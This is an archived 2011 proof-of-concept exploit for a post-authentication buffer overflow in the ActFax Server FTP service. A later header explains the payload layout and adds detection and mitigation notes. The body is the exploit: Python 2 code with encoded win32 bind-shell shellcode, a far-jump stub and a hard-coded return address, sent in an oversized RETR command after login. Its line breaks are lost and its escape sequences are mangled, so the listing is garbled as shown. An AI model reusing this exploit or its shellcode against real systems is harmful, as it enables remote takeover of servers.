
# Title : ActFax Server FTP Remote BOF (post auth) Bigger Buffer
# Published : 2011-06-08
# Author : b33f


			
# NOTE(review): Archived 2011 proof-of-concept for a post-authentication stack
# buffer overflow in the ActFax Server FTP service (oversized RETR argument),
# kept here as captured from the exploit listing. The three lines below are
# byte-identical to the capture; the capture has lost its original line
# breaks, so the text does not run as shown and is documented as a historical
# record rather than as a working script.
#
# What the visible code does (per its own comments and calls):
#   - opens a TCP connection to a hard-coded host, 192.168.1.71 port 21;
#   - logs in with USER b33f / PASS b33f -- the bug is post-auth, so valid
#     FTP credentials are a precondition for reaching the overflow;
#   - sends a single RETR whose argument is roughly 1005 bytes: 41 NOP (0x90)
#     bytes, a 709-byte alphanumeric-encoded win32_bind payload (LPORT=9988,
#     PexAlphaNum encoder), 23 NOPs, a 4-byte return address (the author cites
#     a "jmp esp" in user32.dll at 0x7E429353, tested on Windows XP Pro SP3),
#     1 NOP, a 52-byte alphanumeric "far jump" stub, and 175 trailing NOPs;
#   - per the author's note, the service does not crash until the bind-shell
#     connection is closed.
#
# Defender notes (grounded in the listing above, nothing more):
#   - Detection: an authenticated FTP session issuing a RETR with a ~1 KB
#     argument made up largely of 0x90 bytes, followed by a new listener on
#     TCP/9988 on the fax host.
#   - Mitigation: update ActFax to a release that fixes this issue (see the
#     vendor advisory; version not stated on this page -- [FIXED_VERSION]),
#     keep the FTP service off untrusted networks, and treat FTP credentials
#     as a security boundary since exploitation requires a successful login.
#   - The hard-coded user32.dll address presumes a fixed module base; on
#     platforms with ASLR/DEP that address is unlikely to be valid -- TODO
#     confirm per platform.
#
# Code-quality notes on the listing: it is Python 2 (print statement); the
# trailing `s.close` references the method without calling it, so the socket
# is left to the garbage collector instead of being closed explicitly.
#!/usr/bin/python#-----------------------------------------------------------------------------------# Exploit Title: ActFax Server FTP Remote BOF (post auth)# Author: b33f - Ruben Boonen# Software Link: http://www.actfax.com/download/actfax_setup_en.exe# Tested on: Windows XP PRO SP3 (version 2002) - VMware Workstation#-----------------------------------------------------------------------------------# Credit goes to chap0 for discovering the bug.# Allot of thanks to PoURaN, for helping a n00b understand assembly better!!!#----------------------------------------------------------------------------------- import socketimport sys print "/nActFax XP SP3 Pro..."print "Hunting for alphanumeric code!!/n"#-----------------------------------------------------------------------------------# payload => win32_bind LPORT=9988 Size=709 => Encoder=PexAlphaNum#-----------------------------------------------------------------------------------shellcode = ("/xeb/x03/x59/xeb/x05/xe8/xf8/xff/xff/xff/x4f/x49/x49/x49/x49/x49""/x49/x51/x5a/x56/x54/x58/x36/x33/x30/x56/x58/x34/x41/x30/x42/x36""/x48/x48/x30/x42/x33/x30/x42/x43/x56/x58/x32/x42/x44/x42/x48/x34""/x41/x32/x41/x44/x30/x41/x44/x54/x42/x44/x51/x42/x30/x41/x44/x41""/x56/x58/x34/x5a/x38/x42/x44/x4a/x4f/x4d/x4e/x4f/x4c/x46/x4b/x4e""/x4d/x44/x4a/x4e/x49/x4f/x4f/x4f/x4f/x4f/x4f/x4f/x42/x36/x4b/x38""/x4e/x56/x46/x32/x46/x52/x4b/x48/x45/x34/x4e/x43/x4b/x38/x4e/x47""/x45/x50/x4a/x57/x41/x30/x4f/x4e/x4b/x38/x4f/x44/x4a/x41/x4b/x48""/x4f/x55/x42/x32/x41/x30/x4b/x4e/x49/x44/x4b/x48/x46/x33/x4b/x38""/x41/x30/x50/x4e/x41/x33/x42/x4c/x49/x49/x4e/x4a/x46/x58/x42/x4c""/x46/x57/x47/x50/x41/x4c/x4c/x4c/x4d/x30/x41/x30/x44/x4c/x4b/x4e""/x46/x4f/x4b/x53/x46/x55/x46/x42/x4a/x42/x45/x47/x45/x4e/x4b/x48""/x4f/x35/x46/x52/x41/x30/x4b/x4e/x48/x36/x4b/x58/x4e/x30/x4b/x44""/x4b/x58/x4f/x55/x4e/x51/x41/x30/x4b/x4e/x43/x30/x4e/x52/x4b/x38""/x49/x58/x4e/x56/x46/x42/x4e/x51/x41/x56/x43/x4c/x41/x33/x4b/x4d""/x46/x46/x4b/x48/x43/x34/x42/x43/x4b/x48/x42/x44/x4e/
x50/x4b/x38""/x42/x47/x4e/x51/x4d/x4a/x4b/x38/x42/x54/x4a/x50/x50/x35/x4a/x56""/x50/x38/x50/x54/x50/x30/x4e/x4e/x42/x55/x4f/x4f/x48/x4d/x48/x36""/x43/x35/x48/x36/x4a/x56/x43/x33/x44/x33/x4a/x46/x47/x47/x43/x47""/x44/x33/x4f/x55/x46/x45/x4f/x4f/x42/x4d/x4a/x56/x4b/x4c/x4d/x4e""/x4e/x4f/x4b/x43/x42/x45/x4f/x4f/x48/x4d/x4f/x35/x49/x58/x45/x4e""/x48/x56/x41/x48/x4d/x4e/x4a/x30/x44/x50/x45/x35/x4c/x46/x44/x50""/x4f/x4f/x42/x4d/x4a/x56/x49/x4d/x49/x30/x45/x4f/x4d/x4a/x47/x55""/x4f/x4f/x48/x4d/x43/x45/x43/x55/x43/x55/x43/x45/x43/x55/x43/x44""/x43/x35/x43/x44/x43/x45/x4f/x4f/x42/x4d/x48/x36/x4a/x56/x47/x52""/x46/x30/x48/x36/x43/x55/x49/x38/x41/x4e/x45/x59/x4a/x36/x46/x4a""/x4c/x51/x42/x57/x47/x4c/x47/x45/x4f/x4f/x48/x4d/x4c/x56/x42/x31""/x41/x45/x45/x45/x4f/x4f/x42/x4d/x4a/x46/x46/x4a/x4d/x4a/x50/x32""/x49/x4e/x47/x55/x4f/x4f/x48/x4d/x43/x55/x45/x45/x4f/x4f/x42/x4d""/x4a/x56/x45/x4e/x49/x34/x48/x48/x49/x54/x47/x55/x4f/x4f/x48/x4d""/x42/x35/x46/x55/x46/x55/x45/x45/x4f/x4f/x42/x4d/x43/x39/x4a/x46""/x47/x4e/x49/x47/x48/x4c/x49/x57/x47/x45/x4f/x4f/x48/x4d/x45/x55""/x4f/x4f/x42/x4d/x48/x36/x4c/x56/x46/x46/x48/x36/x4a/x46/x43/x46""/x4d/x56/x49/x38/x45/x4e/x4c/x46/x42/x45/x49/x35/x49/x42/x4e/x4c""/x49/x58/x47/x4e/x4c/x46/x46/x44/x49/x38/x44/x4e/x41/x53/x42/x4c""/x43/x4f/x4c/x4a/x50/x4f/x44/x54/x4d/x32/x50/x4f/x44/x44/x4e/x32""/x43/x59/x4d/x58/x4c/x57/x4a/x33/x4b/x4a/x4b/x4a/x4b/x4a/x4a/x46""/x44/x47/x50/x4f/x43/x4b/x48/x31/x4f/x4f/x45/x37/x46/x44/x4f/x4f""/x48/x4d/x4b/x45/x47/x45/x44/x35/x41/x55/x41/x45/x41/x35/x4c/x56""/x41/x30/x41/x45/x41/x55/x45/x55/x41/x45/x4f/x4f/x42/x4d/x4a/x36""/x4d/x4a/x49/x4d/x45/x30/x50/x4c/x43/x55/x4f/x4f/x48/x4d/x4c/x56""/x4f/x4f/x4f/x4f/x47/x43/x4f/x4f/x42/x4d/x4b/x38/x47/x35/x4e/x4f""/x43/x38/x46/x4c/x46/x46/x4f/x4f/x48/x4d/x44/x55/x4f/x4f/x42/x4d""/x4a/x36/x42/x4f/x4c/x58/x46/x50/x4f/x55/x43/x35/x4f/x4f/x48/x4d""/x4f/x4f/x42/x4d/x5a")#-----------------------------------------------------------------------------------# ASCII encoded  => Size=52# 
Decoded opcode => E9DE140000 - JMP 0178D7A7#-----------------------------------------------------------------------------------farjump = ("/x25/x4A/x4D/x4E/x55"     # AND EAX,554E4D4A"/x25/x35/x32/x31/x2A"     # AND EAX,2A313235"/x2D/x55/x55/x55/x5A"     # SUB EAX,5A555555"/x2D/x55/x55/x55/x5A"     # SUB EAX,5A555555"/x2D/x56/x55/x55/x5B"     # SUB EAX,5B555556"/x50"                     # PUSH EAX"/x25/x4A/x4D/x4E/x55"     # AND EAX,554E4D4A"/x25/x35/x32/x31/x2A"     # AND EAX,2A313235"/x2D/x5D/x60/x4E/x55"     # SUB EAX,554E605D"/x2D/x5D/x60/x4E/x55"     # SUB EAX,554E605D"/x2D/x5D/x60/x4E/x55"     # SUB EAX,554E605D"/x50"                     # PUSH EAX"/xEB/xC1")                # JMP SHORT 0112CAE0 (back to the beginning of ESP,                           # ESP now points to our decoded far-jump).#-----------------------------------------------------------------------------------## At crash time our buffer is copied several times into memory (some of these are# corrupt), so we write some fancy far-jump instruction in ESP. After this is# decoded in memory we jump to our nop bytes (i think 3de itteration of our buffer).# Ironically this doesn't even crash the program, only when you close the bind# shell connection does the program crash...## jmp esp - user32.dll => 0x7E429353#-----------------------------------------------------------------------------------buffer = "/x90"*41 + shellcode + "/x90"*23 + "/x53/x93/x42/x7E" + "/x90"*1 + farjump + "/x90"*175s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)connect=s.connect(('192.168.1.71',21))s.recv(1024)s.send('USER ' + 'b33f/r/n')print (s.recv(1024))s.send('PASS b33f/r/n')print (s.recv(1024))s.send('RETR ' + buffer + '/r/n')s.close